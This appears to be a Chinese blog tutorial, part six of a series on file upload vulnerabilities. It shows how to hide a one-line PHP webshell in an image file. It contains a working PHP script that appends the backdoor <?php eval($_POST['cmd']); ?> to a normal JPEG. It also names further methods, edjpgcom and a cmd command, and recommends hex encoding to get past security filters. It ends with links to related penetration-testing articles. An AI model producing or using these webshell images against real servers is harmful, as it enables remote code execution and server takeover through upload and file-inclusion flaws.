文件上传漏洞(六)一句话马图片

简介: 文件上传漏洞(六)一句话马图片

image.png

 

制作马图

方式一

一句话mu马图片是指将一句话mu马代码隐藏在正常的图片文件中,使得该图片文件成为一个mu马文件。公鸡者可以通过上传该图片文件到受害者的服务器上,并利用文件包含漏洞来执行该mu马代码,从而获取服务器的控制权。

下面是一个生成一句话mu马图片的示例代码:

<?php
$code = '<?php eval($_POST["cmd"]); ?>'; // 一句话马代码
$filename = 'shell.php'; // 生成的马文件名
$image = 'pic.jpg'; // 正常的图片文件名
$webshell = 'webshell.jpg'; // 生成的一句话马图片文件名

// 生成一句话马文件
file_put_contents($filename, $code);

// 将一句话mu马文件和正常的图片文件合并成一张图片马
$data = file_get_contents($image);
$data .= file_get_contents($filename);
file_put_contents($webshell, $data);

// 删除一句话马文件
unlink($filename);

该代码将一句话mu马代码存储在变量$code中,将生成的mu马文件名存储在变量$filename中,将正常的图片文件名存储在变量$image中,将生成的一句话mu马图片文件名存储在变量$webshell中。然后,该代码将一句话mu马文件和正常的图片文件合并成一张图片马,并将其保存为文件webshell.jpg。最后,该代码删除一句话mu马文件。

方式二

利用脚本edjpgcom

将图片投入到edjpgcom脚本,然后写入一句话马

方式三

利用cmd命令

image.png

方式四

利用16进制编写一句话,有更好的绕过安全过滤

image.png


相关文章
|
Shell 网络安全
[网络安全]upload-labs Pass-13 解题详析
[网络安全]upload-labs Pass-13 解题详析
579 0
BUUCTF 我吃三明治 1
BUUCTF 我吃三明治 1
538 1
|
11月前
|
存储 安全 前端开发
Web渗透-文件上传漏洞-上篇
文件上传漏洞常见于Web应用,因类型限制不严可致恶意文件执行。本文介绍前端检测、MIME类型、黑名单、.htaccess、空格、双写等多种绕过方式,并结合upload-labs靶场演示利用方法,提升安全防护认知。
3153 1
Web渗透-文件上传漏洞-上篇
|
开发框架 安全 .NET
Web安全-一句话木马
Web安全-一句话木马
2435 5
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
12693 3
|
安全 Shell 网络安全
文件上传漏洞(四)edjpgcom
文件上传漏洞(四)edjpgcom
|
安全 Shell Linux
Webshell管理工具:AntSword(中国蚁剑)
中国蚁剑的下载、安装、详细使用步骤
16591 1
|
存储 安全 Shell
上传漏洞利用时,没有回显上传目录怎么连接shell
上传漏洞利用时,没有回显上传目录怎么连接shell
|
SQL 安全 PHP
DVWA File Inclusion 通关解析
DVWA File Inclusion 通关解析
|
存储 域名解析 前端开发
云上攻防-云服务篇&对象存储&Bucket桶&任意上传&域名接管&AccessKey泄漏
云上攻防-云服务篇&对象存储&Bucket桶&任意上传&域名接管&AccessKey泄漏
3002 8

热门文章

最新文章